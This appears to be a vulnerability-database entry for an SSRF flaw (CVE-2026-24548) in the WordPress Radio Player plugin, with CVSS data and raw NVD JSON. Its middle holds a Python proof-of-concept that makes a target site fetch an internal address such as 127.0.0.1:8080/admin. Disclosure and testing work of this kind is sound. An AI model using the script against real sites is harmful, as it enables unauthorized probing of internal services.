Security Vulnerability Report
中文
CVE-2026-24548 CVSS 5.4 MEDIUM

CVE-2026-24548

Published: 2026-01-23 15:16:11
Last Modified: 2026-04-28 15:16:13

Description

Server-Side Request Forgery (SSRF) vulnerability in princeahmed Radio Player radio-player allows Server Side Request Forgery.This issue affects Radio Player: from n/a through <= 2.0.91.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Radio Player <= 2.0.91

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys def test_ssrf(target_url, payload_url): """ CVE-2026-24548 SSRF PoC Target: WordPress Radio Player plugin <= 2.0.91 Note: Use only on authorized systems """ # Construct the malicious request endpoint = f"{target_url}/wp-admin/admin-ajax.php" data = { 'action': 'radio_player_ajax', 'function': 'fetch_stream', 'url': payload_url } try: response = requests.post(endpoint, data=data, timeout=10) print(f"Status: {response.status_code}") print(f"Response: {response.text[:500]}") except requests.exceptions.RequestException as e: print(f"Request failed: {e}") if __name__ == "__main__": # Example: Test internal port scanning target = "http://vulnerable-site.com" # Test internal service detection test_ssrf(target, "http://127.0.0.1:8080/admin")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-24548", "sourceIdentifier": "[email protected]", "published": "2026-01-23T15:16:10.940", "lastModified": "2026-04-28T15:16:12.823", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Server-Side Request Forgery (SSRF) vulnerability in princeahmed Radio Player radio-player allows Server Side Request Forgery.This issue affects Radio Player: from n/a through <= 2.0.91."}, {"lang": "es", "value": "Vulnerabilidad de falsificación de petición del lado del servidor (SSRF) en Prince Radio Player radio-player permite falsificación de petición del lado del servidor. Este problema afecta a Radio Player: desde n/a hasta &lt;= 2.0.91."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-918"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/radio-player/vulnerability/wordpress-radio-player-plugin-2-0-91-server-side-request-forgery-ssrf-vulnerability?_s_id=cve", "source": "[email protected]"}]}}